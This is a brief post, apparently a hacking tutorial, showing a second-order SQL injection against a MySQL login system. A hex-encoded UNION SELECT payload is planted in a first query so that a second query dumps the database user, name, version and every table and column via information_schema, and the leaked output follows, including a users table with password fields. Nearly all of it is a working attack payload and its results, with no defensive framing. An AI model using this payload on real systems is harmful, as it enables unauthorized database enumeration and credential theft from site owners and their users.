Inject the second query by manipulating the output of first query

This is the query where you Inject : SELECT id,sec_code FROM users WHERE id='1'and false union select 1,0x2720756e696f6e2073656c65637420636f6e636174283078346536313664363532303361336132303561363536653363363237323365353537333635373232303361336132302c7573657228292c307833633632373233653434363232303361336132302c446174616261736528292c30783363363237323365353636353732373336393666366532303361336132302c76657273696f6e28292c307833633632373233652c6d616b655f73657428362c403a3d307830612c2873656c65637428312966726f6d28696e666f726d6174696f6e5f736368656d612e636f6c756d6e73297768657265287461626c655f736368656d61213d307836393665363636663732366436313734363936663665356637333633363836353664363129616e64403a3d6d616b655f736574283531312c402c307833633663363933652c7461626c655f6e616d652c636f6c756d6e5f6e616d6529292c4029292c3223-- '

This is the query which gives you Output : SELECT username,password FROM users WHERE sec_code='' union select concat(0x4e616d65203a3a205a656e3c62723e55736572203a3a20,user(),0x3c62723e4462203a3a20,Database(),0x3c62723e56657273696f6e203a3a20,version(),0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),2#'

Username is : Name :: Zen
User :: leettime_W89sst1@localhost
Db :: leettime_761wHole
Version :: 5.5.52-cll
  • ,testtable1,testid,
  • ,testtable1,column1,
  • ,testtable1,column2,
  • ,testtable1,column3,
  • ,userlogs,id,
  • ,userlogs,username,
  • ,userlogs,action,
  • ,userlogs,date,
  • ,users,id,
  • ,users,username,
  • ,users,password,
  • ,users,user_type,
  • ,users,sec_code